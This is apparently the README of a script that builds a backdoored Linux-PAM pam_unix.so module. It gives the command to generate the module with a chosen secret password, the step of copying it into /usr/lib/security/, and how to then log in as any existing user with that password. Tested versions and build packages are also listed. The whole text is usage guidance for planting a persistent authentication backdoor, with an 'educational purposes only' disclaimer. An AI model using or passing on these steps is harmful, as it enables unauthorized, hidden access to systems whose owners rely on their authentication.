Linux PAM Backdoor
This script automates the creation of a backdoor for Linux-PAM (Pluggable Authentication Modules)
To generate the backdoored pam_unix.so, just run:
./backdoor.sh -v 1.3.0 -p som3_s3cr4t_p455w0rd
You have to identify the PAM version installed on the system, to make sure the script will compile the right version. Otherwise you can break the whole system authentication.
After the execution of the script, the last step is to copy the generated pam_unix.so to the pam modules dir on the host.
cp pam_unix.so /usr/lib/security/
After that, you can log-in to the system using an existing user, and the previously configured password.
Use this for educational purposes only. I am not responsible for the damage you might cause.
Tested with ubuntu 20.04:
- 1.1.8 and older: failed to compile
- 1.2.0: worked
- 1.3.0 to 1.4.0: worked
The following packages where used
apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc